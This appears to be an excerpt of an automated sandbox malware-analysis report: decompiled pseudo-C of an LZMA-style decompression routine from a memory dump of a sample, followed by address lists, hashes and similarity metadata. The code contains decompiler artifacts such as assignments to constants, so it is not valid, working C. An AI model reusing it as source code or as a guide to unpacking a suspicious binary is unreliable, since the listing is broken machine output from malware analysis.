                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L39;
                          							} else {
                          								goto L37;
                          							}
                          						case 0xe:
                          							L46:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xe;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t156 = __ebp - 0x70;
                          							 *_t156 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t156;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							while(1) {
                          								L48:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x58);
                          								__edx = __ebx + __ebx;
                          								__ecx =  *(__ebp - 0x10);
                          								__esi = __edx + __eax;
                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                          								__ax =  *__esi;
                          								 *(__ebp - 0x54) = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          								__eflags =  *(__ebp - 0xc) - __ecx;
                          								if( *(__ebp - 0xc) >= __ecx) {
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          									__cx = __ax;
                          									_t170 = __edx + 1; // 0x1
                          									__ebx = _t170;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									 *(__ebp - 0x10) = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L46;
                          								}
                          							}
                          							L54:
                          							_t173 = __ebp - 0x34;
                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          							__eflags =  *_t173;
                          							goto L55;
                          						case 0xf:
                          							L58:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xf;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t203 = __ebp - 0x70;
                          							 *_t203 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t203;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L60:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L55:
                          								__al =  *(__ebp - 0x44);
                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          								goto L56;
                          							}
                          							L61:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t217 = __edx + 1; // 0x1
                          								__ebx = _t217;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L60;
                          							} else {
                          								goto L58;
                          							}
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							goto L69;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							L56:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1a;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x68);
                          							__al =  *(__ebp - 0x5c);
                          							__edx =  *(__ebp - 8);
                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          							 *( *(__ebp - 0x68)) = __al;
                          							__ecx =  *(__ebp - 0x14);
                          							 *(__ecx +  *(__ebp - 8)) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t192 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t192;
                          							goto L79;
                          						case 0x1b:
                          							goto L75;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = _t414;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x004066b5
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                          • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00405E9D(void* __ecx) {
                          				void* _v8;
                          				void* _v12;
                          				signed int _v16;
                          				unsigned int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v95;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				intOrPtr _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				void _v140;
                          				void* _v148;
                          				signed int _t537;
                          				signed int _t538;
                          				signed int _t572;
                          
                          				_t572 = 0x22;
                          				_v148 = __ecx;
                          				memcpy( &_v140, __ecx, _t572 << 2);
                          				if(_v52 == 0xffffffff) {
                          					return 1;
                          				}
                          				while(1) {
                          					L3:
                          					_t537 = _v140;
                          					if(_t537 > 0x1c) {
                          						break;
                          					}
                          					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
                          						case 0:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v116 = _v116 + 1;
                          							_t537 =  *_v116;
                          							__eflags = _t537 - 0xe1;
                          							if(_t537 > 0xe1) {
                          								goto L174;
                          							}
                          							_t542 = _t537 & 0x000000ff;
